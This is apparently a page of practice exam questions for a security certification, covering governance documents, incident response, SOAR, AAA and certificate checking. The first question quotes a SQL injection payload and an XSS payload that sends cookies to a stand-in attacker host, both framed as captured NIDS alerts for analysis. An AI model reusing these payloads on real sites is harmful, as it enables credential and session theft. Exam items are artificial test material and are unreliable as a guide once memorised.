Tüm alıştırma soruları
2232 soru
A network security monitoring (NSM) sensor captures telemetry from an isolated subnet containing an intentional decoy server. The Network Intrusion Detection System (NIDS) generates alerts containing the following captured HTTP GET request payloads:
Payload 1: GET /search.php?id=100' UNION SELECT username, password FROM users--
Payload 2: GET /profile.php?name=<script>document.location='http://attacker-c2.com/collect?c='+document.cookie</script>
Which of the following statements correctly interpret this network telemetry and security control architecture? (Select TWO.)
Geçerli olan tümünü seçin
A cybersecurity analyst must conduct a comprehensive vulnerability assessment on internal Linux servers hosting sensitive database services. The assessment requirements specify that the process must identify missing local software updates and misconfigured operating system kernel parameters while minimizing network bandwidth consumption and avoiding risk of service disruption caused by active network probing. Which of the following vulnerability assessment approaches best fulfills these operational requirements?
A software engineering team is preparing to deploy an updated microservice that modifies shared container network policies and ingress routing rules within a production Kubernetes cluster. Which of the following steps must be completed as part of the formal change management workflow to evaluate and mitigate security risks prior to implementation? (Select TWO.)
Geçerli olan tümünü seçin
Following a series of regulatory audits, an enterprise Chief Information Security Officer (CISO) publishes an executive document mandating that all sensitive customer data must be protected against unauthorized disclosure across all environments to set management's strategic intent. Shortly thereafter, the security engineering team publishes a separate compulsory document specifying that all cloud databases must utilize AES-256 GCM encryption with key rotation enforced every 90 days. Which of the following correctly classifies these two documents within the organizational security governance hierarchy?
A security analyst is designing a secure telemetry collection architecture for edge gateway devices transmitting environmental data to an enterprise cloud endpoint. The design mandates establishing keying material that ensures perfect forward secrecy and validating the authenticity and data integrity of each transmitted payload with minimal performance overhead. Which of the following cryptographic techniques should the analyst select to meet these requirements? (Select TWO.)
Geçerli olan tümünü seçin
A network security analyst receives a SIEM alert indicating suspicious encrypted outbound traffic from an internal host to an untrusted external IP address. Place the following incident triage and network monitoring response actions in the correct chronological order, from initial alert confirmation to threat containment.
Öğeleri doğru sıraya koymak için sürükleyin
An employee attempting to navigate to an external vendor portal mistypes the domain name in the web browser address bar and is redirected to a fraudulent site designed to mimic the authentic login screen. Which of the following attack vectors is demonstrated in this scenario?
Match each social engineering principle of influence on the left with its corresponding enterprise attack scenario description on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A security operations center (SOC) team is deploying a Security Orchestration, Automation, and Response (SOAR) playbook to handle automated containment when secret-scanning tools detect exposed API keys in public code repositories. In what sequence should the SOAR engine execute the following playbook steps?
Öğeleri doğru sıraya koymak için sürükleyin
An organization is establishing a comprehensive security governance framework. The Chief Information Security Officer (CISO) needs to publish documents that define mandatory, high-level organizational security objectives as well as detailed step-by-step instructions for technical teams to execute. Which of the following governance document types fulfill these specific requirements? (Select TWO).
Geçerli olan tümünü seçin
An organization is restructuring its information security governance framework following a major compliance assessment. The Chief Information Security Officer (CISO) needs to categorize four key documentation elements within the administrative governance hierarchy based on their operational enforcement level and organizational scope. Match each security governance document type on the left with its corresponding operational attribute on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
During an ongoing incident investigation, an incident response team discovers that an employee's workstation was compromised via a malicious macro attachment, enabling unauthorized network scanning and lateral movement attempts towards internal file servers. According to standard incident response playbooks for host compromise, which of the following containment actions should the team perform immediately? (Select TWO.)
Geçerli olan tümünü seçin
A security analyst is reviewing a high-level organizational document that explicitly states all company-owned endpoints must enforce encryption at rest to protect sensitive data. The document provides overall leadership direction and is mandatory for all employees, but it does not detail specific software configurations or step-by-step commands. Which of the following governance document types best describes this document?
A security analyst is investigating an automated alert from a cloud-hosted API gateway. A third-party developer successfully logged into the developer portal using single sign-on (SSO) credentials. However, when the developer attempted to issue a DELETE call against a production storage bucket, the API gateway returned a 403 Forbidden error because the developer's OAuth 2.0 access token lacked the required write/delete scope claims. Which pillar of the Authentication, Authorization, and Accounting (AAA) security framework directly enforced the decision to block the DELETE request?
A security engineer is troubleshooting intermittent connection timeouts and handshake failures reported by users accessing a high-security internal web application. Network logs indicate that client web browsers are attempting to query external Certificate Authority (CA) validation servers to verify the revocation status of the application's TLS certificate. However, client endpoints are on a strict zero-trust VLAN with no outbound internet access, causing the certificate status requests to block and eventually time out. Which of the following should the security engineer implement on the web server to resolve the validation failures while maintaining certificate status checking?
A cloud security operations center receives automated alerts flagging unusual outbound DNS query patterns originating from an internal web application server. The telemetry reveals thousands of high-frequency sub-domain requests formatted as encoded payloads appended to an external domain, accompanied by oversized TXT record responses. Which of the following initial actions should the security analyst take to investigate and contain this activity? (Select TWO.)
Geçerli olan tümünü seçin
Match each information security governance document type on the left with its correct operational description on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A security operations team deploys an automated Security Orchestration, Automation, and Response (SOAR) playbook to mitigate compromised account alerts. The playbook is designed to connect to the organization's identity provider and immediately invalidate active session tokens when high-confidence alert criteria are met. During testing, the SOAR workflow successfully authenticates using API credentials but fails when attempting to execute the token revocation call, returning an HTTP 403 Forbidden response. Which of the following best explains why this automated remediation step failed?
A healthcare organization's security team identified a critical remote code execution vulnerability in a legacy diagnostic server. Because replacing or updating the server would temporarily disrupt essential patient care operations, the Chief Information Security Officer (CISO) approves placing the server on an isolated microsegmented subnet, restricting inbound network traffic using strict firewall rules, and deploying specialized host monitoring to reduce the likelihood of exploitation. Which risk response strategy did the organization primarily execute?
Following a cloud security assessment, a Chief Risk Officer directs the security team to enforce consistent security configurations across all newly provisioned virtual machine instances. The engineering team requires a governance document that specifies the mandatory, platform-specific minimum security settings—such as disabled default accounts, mandatory audit logging parameters, and specific host firewall rules—that every instance must satisfy before being joined to the enterprise network, while allowing technical teams to determine their own specific deployment scripts. Which of the following governance document types should the security team establish to satisfy this requirement?